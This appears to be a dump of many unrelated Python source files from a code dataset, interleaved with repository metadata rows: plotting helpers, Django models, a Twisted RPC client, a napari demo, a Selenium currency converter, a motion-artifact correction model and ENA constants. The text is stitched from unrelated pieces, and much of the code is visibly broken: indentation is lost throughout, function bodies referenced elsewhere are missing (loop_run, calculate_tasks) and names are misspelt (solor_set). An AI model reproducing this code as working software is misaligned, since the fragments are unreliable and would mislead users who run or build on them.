min_value = np.min(np.min(data))
bins = np.arange(min_value - bin_size, max_value + bin_size, bin_size) # fixed bin size
plt.xlim([min_value - bin_size, max_value + bin_size])
for data_list_tmp in data:
if debug:
assert islist(data_list_tmp), 'the nested list is not correct!'
# plt.hist(data_list_tmp, bins=bins, alpha=0.3)
sns.distplot(data_list_tmp, bins=bins, kde=False)
# sns.distplot(data_list_tmp, bins=bins, kde=False)
else:
bins = np.arange(min(data) - 10 * bin_size, max(data) + 10 * bin_size, bin_size) # fixed bin size
plt.xlim([min(data) - bin_size, max(data) + bin_size])
plt.hist(data, bins=bins, alpha=0.5)
plt.title('distribution of data')
plt.xlabel('data (bin size = %f)' % bin_size)
plt.ylabel('count')
return save_vis_close_helper(fig=fig, ax=ax, vis=vis, save_path=save_path, debug=debug, closefig=closefig)
def visualize_bar(data, bin_size=2.0, title='Bar Graph of Key-Value Pair', xlabel='index', ylabel='count', vis=True, save_path=None, debug=True, closefig=True):
'''
visualize the bar graph of a data, which can be a dictionary or list of dictionary
different from function of visualize_bar_graph, this function does not depend on panda and dataframe, it's simpler but with less functionality
also the key of this function takes continuous scalar variable
'''
if debug:
assert isstring(title) and isstring(xlabel) and isstring(ylabel), 'title/xlabel/ylabel is not correct'
assert isdict(data) or islist(data), 'input data is not correct'
assert isscalar(bin_size), 'the bin size is not a floating number'
if isdict(data):
index_list = data.keys()
if debug:
assert islistofscalar(index_list), 'the input dictionary does not contain a scalar key'
frequencies = data.values()
else:
index_list = range(len(data))
frequencies = data
index_str_list = scalarlist2strlist(index_list, debug=debug)
index_list = np.array(index_list)
fig, ax = get_fig_ax_helper(fig=None, ax=None)
# ax.set_xticks(index_list)
# ax.set_xticklabels(index_str_list)
plt.bar(index_list, frequencies, bin_size, color='r', alpha=0.5)
plt.title(title, fontsize=20)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
return save_vis_close_helper(fig=fig, ax=ax, vis=vis, save_path=save_path, debug=debug, transparent=False, closefig=closefig)
def visualize_bar_graph(data, title='Bar Graph of Key-Value Pair', xlabel='pixel error', ylabel='keypoint index', label=False, label_list=None, vis=True, save_path=None, debug=True, closefig=True):
'''
visualize the bar graph of a data, which can be a dictionary or list of dictionary
inside each dictionary, the keys (string) should be the same which is the y label, the values should be scalar
'''
if debug:
assert isstring(title) and isstring(xlabel) and isstring(ylabel), 'title/xlabel/ylabel is not correct'
assert isdict(data) or islistofdict(data), 'input data is not correct'
if isdict(data):
assert all(isstring(key_tmp) for key_tmp in data.keys()), 'the keys are not all strings'
assert all(isscalar(value_tmp) for value_tmp in data.values()), 'the keys are not all strings'
else:
assert len(data) <= len(color_set), 'number of data set is larger than number of color to use'
keys = sorted(data[0].keys())
for dict_tmp in data:
if not (sorted(dict_tmp.keys()) == keys):
print(dict_tmp.keys())
print(keys)
assert False, 'the keys are not equal across different input set'
assert all(isstring(key_tmp) for key_tmp in dict_tmp.keys()), 'the keys are not all strings'
assert all(isscalar(value_tmp) for value_tmp in dict_tmp.values()), 'the values are not all scalars'
# convert dictionary to DataFrame
data_new = dict()
if isdict(data):
key_list = data.keys()
sorted_index = sorted(range(len(key_list)), key=lambda k: key_list[k])
data_new['names'] = (np.asarray(key_list)[sorted_index]).tolist()
data_new['values'] = (np.asarray(data.values())[sorted_index]).tolist()
else:
key_list = data[0].keys()
sorted_index = sorted(range(len(key_list)), key=lambda k: key_list[k])
data_new['names'] = (np.asarray(key_list)[sorted_index]).tolist()
num_sets = len(data)
for set_index in range(num_sets):
data_new['value_%03d'%set_index] = (np.asarray(data[set_index].values())[sorted_index]).tolist()
dataframe = DataFrame(data_new)
# plot
width = 2000
height = 2000
alpha = 0.5
figsize = width / float(dpi), height / float(dpi)
fig = plt.figure(figsize=figsize)
sns.set(style='whitegrid')
# fig, ax = get_fig_ax_helper(fig=None, ax=None)
if isdict(data):
g = sns.barplot(x='values', y='names', data=dataframe, label='data', color='b')
plt.legend(ncol=1, loc='lower right', frameon=True, fontsize=5)
else:
num_sets = len(data)
for set_index in range(num_sets):
if set_index == 0:
sns.set_color_codes('pastel')
else:
sns.set_color_codes('muted')
if label:
sns.barplot(x='value_%03d'%set_index, y='names', data=dataframe, label=label_list[set_index], color=color_set[set_index], alpha=alpha)
else:
sns.barplot(x='value_%03d'%set_index, y='names', data=dataframe, color=solor_set[set_index], alpha=alpha)
plt.legend(ncol=len(data), loc='lower right', frameon=True, fontsize=5)
sns.despine(left=True, bottom=True)
plt.title(title, fontsize=20)
plt.xlim([0, 50])
plt.xlabel(xlabel)
plt.ylabel(ylabel)
num_yticks = len(data_new['names'])
adaptive_fontsize = -0.0555556 * num_yticks + 15.111
plt.yticks(fontsize=adaptive_fontsize)
return save_vis_close_helper(fig=fig, vis=vis, save_path=save_path, debug=debug, closefig=closefig) | 49.674208 | 269 | 0.660867 |
49b2849f5a27a9f4b798aac2f6c1149060ada338 | 96 | py | Python | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
| 16 | 34 | 0.770833 |
49b384eb266010cb19d2dcb98f62539f08a56ecd | 2,530 | py | Python | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | null | null | null | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | 28 | 2019-03-29T13:34:57.000Z | 2019-07-04T09:27:07.000Z | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | null | null | null | """Vary the rhoref parameter to find a sane value.
Copyright 2019 Simulation Lab
University of Freiburg
Author: Lukas Elflein <elfleinl@cs.uni-freiburg.de>
"""
from __future__ import print_function
import os
import shutil
#import multiprocessing
#import sys
import random
from loop_cost_functions import calc_cost_function
from smamp.tools import cd
from smamp.tools import check_existence
def get_tasks(path_to_subdir):
"""Vary the lnrho weighting parameter, create folder and execute."""
sweep_dir = 'lnrho_sweep'
if os.path.exists(sweep_dir):
# print('Removing old dir')
# shutil.rmtree(sweep_dir)
pass
else:
print('making dir')
os.mkdir(sweep_dir)
print('dir made.')
tasks = []
skipped = 0
for sigma in [0.2, 0.4, 0.6, 0.8, 1.0, 1.2, 1.4]:
#for lnrho in [-9, -8, -7, -6, -5, -4, -3, -2]:
for lnrho in [-7, -6, -5.5, -5, -4.75, -4.5, -4.25, -4, -3.5]:
output_name = os.path.join(sweep_dir, 'cost_{}_{}.h5'.format(lnrho, sigma))
if os.path.exists(output_name):
# print('{} exists. Do not include in worklist.'.format(output_name))
skipped += 1
continue
else:
tasks += [(path_to_subdir, lnrho, sigma, output_name)]
print('{} files found and skipped.'.format(skipped))
return tasks
def main():
""" Execute everything."""
print('This is {}.'.format(__file__))
print('Current working dir: {}'.format(os.getcwd()))
tasks = []
# Crawl the directory structure
for subdir, dirs, files in sorted(os.walk('.')):
# Exclude template folders from search
if 'template' in subdir or 'exclude' in subdir or 'lnrho_sweep' in subdir:
continue
# Select the folder to calculate in
if 'horton_cost_function' in subdir:
print('Moving to {}'.format(subdir))
with cd(subdir):
subdir_tasks = get_tasks(subdir)
tasks += subdir_tasks
calculate_tasks(tasks)
print('Done.')
if __name__ == '__main__':
main()
| 28.75 | 84 | 0.617787 |
49b5f0ea075bbb7b79a2d40b2e4b0bdffec0743f | 12,388 | py | Python | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 1 | 2019-02-15T04:21:48.000Z | 2019-02-15T04:21:48.000Z | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 254 | 2017-12-23T19:36:43.000Z | 2020-04-14T21:46:13.000Z | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 1 | 2017-12-23T18:42:16.000Z | 2017-12-23T18:42:16.000Z | from __future__ import absolute_import, unicode_literals
import pytest
from libweasyl import staff
from libweasyl.legacy import UNIXTIME_OFFSET
from weasyl import errorcode
from weasyl import siteupdate
from weasyl.define import sessionmaker
from weasyl.test import db_utils
_FORM = {
u'title': u'Title',
u'content': u'Content',
}
| 39.705128 | 144 | 0.690265 |
49b63c647e63040901947f17755b744a1b67eb27 | 298 | py | Python | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | 3 | 2020-11-04T05:38:53.000Z | 2021-03-02T02:15:19.000Z | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | import sys
N = int(sys.stdin.readline())
dis = list(map(int, sys.stdin.readline().split()))
coin = list(map(int, sys.stdin.readline().split()))
use_coin = coin[0]
tot = dis[0] * use_coin
for i in range(1, N - 1):
if coin[i] < use_coin:
use_coin = coin[i]
tot += dis[i] * use_coin
print(tot) | 19.866667 | 51 | 0.64094 |
49b84672d25848b03244c392641967f515178752 | 1,395 | py | Python | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 18 | 2015-01-19T15:27:02.000Z | 2018-12-29T17:30:36.000Z | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 6 | 2015-05-27T11:28:18.000Z | 2016-12-19T06:35:55.000Z | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 4 | 2015-03-24T22:18:27.000Z | 2018-02-05T18:12:45.000Z | from twisted.internet import defer, reactor
if __name__ == '__main__':
reactor.callWhenRunning(main)
reactor.run()
| 27.352941 | 87 | 0.387097 |
49ba5224fd8503eb5f417c4656d1970b4252f78d | 714 | py | Python | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | # Converts user-defined currencies using Google
import webbrowser, os, selenium
from selenium import webdriver
driver = webdriver.Firefox()
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
currencyX = input("Original Currency: ")
currencyYname = input("Output Currency: ")
currencyX_value = input("Value in " + currencyX + ": ")
URL = 'https://www.google.com/search?client=firefox-b-d&q=' + currencyX_value + ' ' + currencyX + ' to ' + currencyYname
driver.get(URL)
goal = driver.find_element_by_class_name('SwHCTb')
currencyY = goal.text
print('Value in ' + currencyYname + ': ' + currencyY) | 39.666667 | 149 | 0.710084 |
49bc98db6539f3a16066fd5753ae5ccc2e439eb8 | 1,107 | py | Python | tests/test_dht.py | fakegit/stilio | cf198b8ccadc7dcadc462ce83b801af00ef4e2f2 | [
"Apache-2.0"
] | 71 | 2019-10-09T17:18:12.000Z | 2022-02-26T12:15:53.000Z | tests/test_dht.py | zinsking/stilio | eade3c1993e185bef53fa25b4e12fe8be330251c | [
"Apache-2.0"
] | 3 | 2019-10-16T17:52:48.000Z | 2021-12-01T16:50:18.000Z | tests/test_dht.py | zinsking/stilio | eade3c1993e185bef53fa25b4e12fe8be330251c | [
"Apache-2.0"
] | 11 | 2020-01-21T09:09:14.000Z | 2022-03-27T12:05:36.000Z | from stilio.crawler.dht.node import Node
| 31.628571 | 60 | 0.581752 |
49bd3fd869f70ef4d24196d954aa248d999405b6 | 714 | py | Python | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 2 | 2021-05-10T13:44:15.000Z | 2022-03-16T20:20:39.000Z | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 1 | 2021-05-17T16:11:54.000Z | 2021-05-19T19:38:50.000Z | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 2 | 2021-05-17T16:36:12.000Z | 2022-03-18T15:07:14.000Z | import napari
import time
from napari._qt.qthreading import thread_worker
import numpy as np
# create a viewer window
viewer = napari.Viewer()
# https://napari.org/guides/stable/threading.html
def update_layer(image):
"""
Updates the image in the layer 'result'
or adds this layer.
"""
try:
viewer.layers['result'].data = image
except KeyError:
viewer.add_image(image, name='result')
# Start the loop
worker = loop_run()
worker.yielded.connect(update_layer)
worker.start()
# Start napari
napari.run()
| 20.4 | 49 | 0.676471 |
49bec7c54696e35577e6576d879d884656bd76e8 | 1,937 | py | Python | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | from enum import Enum
from requests import Response
from urllib.parse import unquote
import json
| 28.485294 | 87 | 0.661848 |
49c08ac397715e801d537d9aef1fa2cc32d852d3 | 3,915 | py | Python | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | 1 | 2021-06-27T15:49:18.000Z | 2021-06-27T15:49:18.000Z | """
This module provides a ``CompositePKModel`` which allows for basic retrieval
and saving of models with composite keys.
It is limited to the above tasks, and any use of the model past this is not
guaranteed to work.
A model with composite PK should look something like this::
from composite_pk import composite
class Lot(composite.CompositePKModel):
auction = models.ForeignKey(Auction, primary_key=True)
lot_number = models.IntegerField(primary_key=True)
objects = composite.CompositePKManager()
So it must:
* subclass the ``CompositePKModel``,
* have two or more fields which set the ``primary_key`` attribute to True,
and
* use the ``CompositePKManager`` as the initial manager.
"""
__version__ = "1.0.1"
__author__ = "Ubuviz"
from django.db import models
from django.db.models.base import ModelBase
| 32.090164 | 89 | 0.614049 |
49c27444ea8191b6871d22350e36ce9770315509 | 752 | py | Python | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/curry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 11 | 2018-07-28T17:08:23.000Z | 2019-02-08T03:04:03.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 33 | 2019-07-09T09:46:44.000Z | 2019-09-23T23:44:37.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 4 | 2019-05-28T01:27:49.000Z | 2019-12-26T18:01:51.000Z | from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian(mu, sigma, block, kernel=None):
'''
Construct to create a discrete approximation of the gaussian distribution using mu and sigma
(gaussian 0 1 blocka)
'''
return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
| 34.181818 | 133 | 0.668883 |
49c3520395affa81361da9069657257acb15bac3 | 8,299 | py | Python | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | import numpy as np
import torch
import time
from scipy import optimize
from scipy.stats import norm
import tmac.probability_distributions as tpd
import tmac.fourier as tfo
def tmac_ac(red_np, green_np, optimizer='BFGS', verbose=False, truncate_freq=False):
""" Implementation of the Two-channel motion artifact correction method (TMAC)
This is tmac_ac because it is the additive and circular boundary version
This code takes in imaging fluoresence data from two simultaneously recorded channels and attempts to remove
shared motion artifacts between the two channels
Args:
red_np: numpy array, [time, neurons], activity independent channel
green_np: numpy array, [time, neurons], activity dependent channel
optimizer: string, scipy optimizer
verbose: boolean, if true, outputs when inference is complete on each neuron and estimates time to finish
truncate_freq: boolean, if true truncates low amplitude frequencies in Fourier domain. This should give the same
results but may give sensitivity to the initial conditions
Returns: a dictionary containing: all the inferred parameters of the model
"""
# optimization is performed using Scipy optimize, so all tensors should stay on the CPU
device = 'cpu'
dtype = torch.float64
red_nan = np.any(np.isnan(red_np))
red_inf = np.any(np.isinf(red_np))
green_nan = np.any(np.isnan(green_np))
green_inf = np.any(np.isinf(green_np))
if red_nan or red_inf or green_nan or green_inf:
raise Exception('Input data cannot have any nan or inf')
# convert data to units of fold mean and subtract mean
red_np = red_np / np.mean(red_np, axis=0) - 1
green_np = green_np / np.mean(green_np, axis=0) - 1
# convert to tensors and fourier transform
red = torch.tensor(red_np, device=device, dtype=dtype)
green = torch.tensor(green_np, device=device, dtype=dtype)
red_fft = tfo.real_fft(red)
green_fft = tfo.real_fft(green)
# estimate all model parameters from the data
variance_r_noise_init = np.var(red_np, axis=0)
variance_g_noise_init = np.var(green_np, axis=0)
variance_a_init = np.var(green_np, axis=0)
variance_m_init = np.var(red_np, axis=0)
# initialize length scale using the autocorrelation of the data
length_scale_a_init = np.zeros(red_np.shape[1])
length_scale_m_init = np.zeros(red_np.shape[1])
for n in range(green_np.shape[1]):
# approximate as the standard deviation of a gaussian fit to the autocorrelation function
length_scale_m_init[n] = initialize_length_scale(red_np[:, n])
length_scale_a_init[n] = initialize_length_scale(green_np[:, n])
# preallocate space for all the training variables
a_trained = np.zeros(red_np.shape)
m_trained = np.zeros(red_np.shape)
variance_r_noise_trained = np.zeros(variance_r_noise_init.shape)
variance_g_noise_trained = np.zeros(variance_g_noise_init.shape)
variance_a_trained = np.zeros(variance_a_init.shape)
length_scale_a_trained = np.zeros(length_scale_a_init.shape)
variance_m_trained = np.zeros(variance_m_init.shape)
length_scale_m_trained = np.zeros(length_scale_m_init.shape)
# loop through each neuron and perform inference
start = time.time()
for n in range(red_np.shape[1]):
# get the initial values for the hyperparameters of this neuron
# All hyperparameters are positive so we fit them in log space
evidence_training_variables = np.log([variance_r_noise_init[n], variance_g_noise_init[n], variance_a_init[n],
length_scale_a_init[n], variance_m_init[n], length_scale_m_init[n]])
# define the evidence loss function. This function takes in and returns pytorch tensors
# a wrapper function of evidence that takes in and returns numpy variables
# wrapper function of for Jacobian of the evidence that takes in and returns numpy variables
# optimization function with Jacobian from pytorch
trained_variances = optimize.minimize(evidence_loss_fn_np, evidence_training_variables,
jac=evidence_loss_jacobian_np,
method=optimizer)
# calculate the posterior values
# The posterior is gaussian so we don't need to optimize, we find a and m in one step
trained_variance_torch = torch.tensor(trained_variances.x, dtype=dtype, device=device)
a, m = tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], trained_variance_torch[0], green[:, n], green_fft[:, n], trained_variance_torch[1],
trained_variance_torch[2], trained_variance_torch[3], trained_variance_torch[4], trained_variance_torch[5],
calculate_posterior=True, truncate_freq=truncate_freq)
a_trained[:, n] = a.numpy()
m_trained[:, n] = m.numpy()
variance_r_noise_trained[n] = torch.exp(trained_variance_torch[0]).numpy()
variance_g_noise_trained[n] = torch.exp(trained_variance_torch[1]).numpy()
variance_a_trained[n] = torch.exp(trained_variance_torch[2]).numpy()
length_scale_a_trained[n] = torch.exp(trained_variance_torch[3]).numpy()
variance_m_trained[n] = torch.exp(trained_variance_torch[4]).numpy()
length_scale_m_trained[n] = torch.exp(trained_variance_torch[5]).numpy()
if verbose:
decimals = 1e3
# print out timing
elapsed = time.time() - start
remaining = elapsed / (n + 1) * (red_np.shape[1] - (n + 1))
elapsed_truncated = np.round(elapsed * decimals) / decimals
remaining_truncated = np.round(remaining * decimals) / decimals
print(str(n + 1) + '/' + str(red_np.shape[1]) + ' neurons complete')
print(str(elapsed_truncated) + 's elapsed, estimated ' + str(remaining_truncated) + 's remaining')
trained_variables = {'a': a_trained,
'm': m_trained,
'variance_r_noise': variance_r_noise_trained,
'variance_g_noise': variance_g_noise_trained,
'variance_a': variance_a_trained,
'length_scale_a': length_scale_a_trained,
'variance_m': variance_m_trained,
'length_scale_m': length_scale_m_trained,
}
return trained_variables
def initialize_length_scale(y):
""" Function to fit a Gaussian to the autocorrelation of y
Args:
y: numpy vector
Returns: Standard deviation of a Gaussian fit to the autocorrelation of y
"""
x = np.arange(-len(y)/2, len(y)/2) + 0.5
y_z_score = (y - np.mean(y)) / np.std(y)
y_corr = np.correlate(y_z_score, y_z_score, mode='same')
# fit the std of a gaussian to the correlation function
p_init = np.array((np.max(y_corr), 1.0))
p_hat = optimize.leastsq(loss, p_init)[0]
# return the standard deviation
return p_hat[1]
| 49.106509 | 156 | 0.662128 |
49c41f791b3306b65a7220115c0864d09f5d6134 | 2,166 | py | Python | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 5 | 2020-10-14T14:10:27.000Z | 2020-11-23T12:46:08.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 5 | 2020-10-14T18:57:37.000Z | 2021-10-21T11:10:12.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | [
"MIT"
] | 1 | 2021-12-01T08:55:28.000Z | 2021-12-01T08:55:28.000Z | from arguments import get_args
import numpy as np
from network.models import MLP_Net
from utils.utils import get_env_params
import torch
import os, gym
"""
script to watch the demo of the ESIL
"""
# process the inputs
if __name__ == '__main__':
args = get_args()
# create environment
env = gym.make(args.env_name)
# get the environment parameters
env_params = get_env_params(env)
# start to create model
model_path = '{}/{}/model.pt'.format(args.save_dir, args.env_name)
network = MLP_Net(env_params['obs'] + env_params['goal'], env_params['action'], args.dist)
network_model, obs_mean, obs_std, g_mean, g_std = torch.load(model_path, map_location='cpu')
network.load_state_dict(network_model)
network.eval()
# start to do the testing
for i in range(args.demo_length):
observation = env.reset()
# start to do the demo
obs, g = observation['observation'], observation['desired_goal']
for t in range(env._max_episode_steps):
if args.render:
env.render()
inputs = process_inputs(obs, g, obs_mean, obs_std, g_mean, g_std, args)
with torch.no_grad():
_, pi = network(inputs)
if args.dist == 'gauss':
mean, std = pi
input_actions = mean.detach().cpu().numpy().squeeze()
else:
raise NotImplementedError
# put actions into the environment
observation_new, reward, _, info = env.step(input_actions)
obs = observation_new['observation']
print('the episode is: {}, is success: {}'.format(i, info['is_success']))
| 40.111111 | 96 | 0.636657 |
49c45451bcf8f4588b0bba3456a64c9403ea4bc6 | 1,071 | py | Python | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 7 | 2020-08-17T07:20:30.000Z | 2022-02-03T19:21:53.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 4 | 2020-11-01T10:39:11.000Z | 2021-07-30T12:20:52.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | [
"MIT"
] | 4 | 2020-11-01T09:12:39.000Z | 2021-08-23T13:25:00.000Z | from datetime import datetime
from kickbase_api.models._transforms import parse_date, parse_key_value_array_to_dict
from kickbase_api.models.base_model import BaseModel
from kickbase_api.models.league_user_season_stats import LeagueUserSeasonStats
| 32.454545 | 104 | 0.655462 |
49c52e67e91490b5205014ce1748575c1b06124d | 9,647 | py | Python | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 2 | 2015-03-30T16:36:51.000Z | 2016-06-15T01:39:47.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 2 | 2021-06-10T17:43:54.000Z | 2021-12-13T19:40:08.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | [
"Apache-2.0"
] | 1 | 2015-11-08T00:40:11.000Z | 2015-11-08T00:40:11.000Z | """ Interfaces for FCRepoRequestFactory, FCRepoResponse and FCRepoResponseBody.
"""
from exceptions import NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
| 35.996269 | 79 | 0.59604 |
49c547bb09c7eed025dfa278cd31af58e1182d17 | 4,397 | py | Python | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | 2 | 2019-07-18T18:35:31.000Z | 2021-09-12T14:00:58.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | 1 | 2020-04-26T04:22:26.000Z | 2020-05-11T08:54:44.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | [
"AFL-1.1"
] | null | null | null | #utf8
from __future__ import print_function, division
import subprocess
import os
import os.path
import sys
import time
default_tmp_mesh_filename = '/tmp/Mesh_1.med'
# salome 9.x may be too new for this script, some version released in 2018 is better
# salome_app = '/media/sf_OneDrive/Salome-9.8.0/salome'
salome_app = '/home/qingfeng/SALOME-9.7.0/salome'
gmsh_app = '/media/sf_OneDrive/gmsh-4.10.2-Linux64/bin/gmsh'
| 43.97 | 120 | 0.705254 |
49c7ae5b76fbf1b02e8d130eadfb4143e44dcc80 | 8,141 | py | Python | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 3 | 2020-09-23T13:06:41.000Z | 2022-01-14T10:14:20.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 65 | 2020-09-23T13:22:41.000Z | 2022-03-17T11:02:42.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | [
"MIT"
] | 4 | 2020-09-25T11:28:45.000Z | 2021-11-01T12:00:13.000Z | """Values for controlled vocabularies from ENA.
Taken from
- https://ena-docs.readthedocs.io/en/latest/submit/reads/webin-cli.html
"""
# Constants for platform definitions.
LS454 = "LS454"
ILLUMINA = "ILLUMINA"
PACBIO_SMRT = "PACBIO_SMRT"
IONTORRENT = "ION_TORRENT"
CAPILLARY = "CAPILLARY"
ONT = "OXFORD_NANOPORE"
BGISEQ = "BGISEQ"
DNBSEQ = "DNBSEQ"
#: Allowed platforms in ENA.
PLATFORMS = (LS454, ILLUMINA, PACBIO_SMRT, IONTORRENT, CAPILLARY, ONT, BGISEQ, DNBSEQ)
# Constants for platforms.
LS454_454GS = "454 GS"
LS454_454GS_240 = "454 GS 20"
LS454_454GS_FLX = "454 GS FLX"
LS454_454GS_FLX_PLUS = "454 GS FLX+"
LS454_454GS_FLX_TITANIUM = "454 GS FLX Titanium"
LS454_454GS_JUNIOR = "454 GS Junior"
ILLUMINA_HISEQX_FIVE = "HiSeq X Five"
ILLUMINA_HISEQX_TEN = "HiSeq X Ten"
ILLUMINA_GA = "Illumina Genome Analyzer"
ILLUMINA_GA2 = "Illumina Genome Analyzer II"
ILLUMINA_GA2x = "Illumina Genome Analyzer IIx"
ILLUMINA_HISCANQ = "Illumina HiScanSQ"
ILLUMINA_HISEQ_1000 = "Illumina HiSeq 1000"
ILLUMINA_HISEQ_1500 = "Illumina HiSeq 1500"
ILLUMINA_HISEQ_2000 = "Illumina HiSeq 2000"
ILLUMINA_HISEQ_2500 = "Illumina HiSeq 2500"
ILLUMINA_HISEQ_3000 = "Illumina HiSeq 3000"
ILLUMINA_HISEQ_4000 = "Illumina HiSeq 4000"
ILLUMINA_ISEQ_100 = "Illumina iSeq 100"
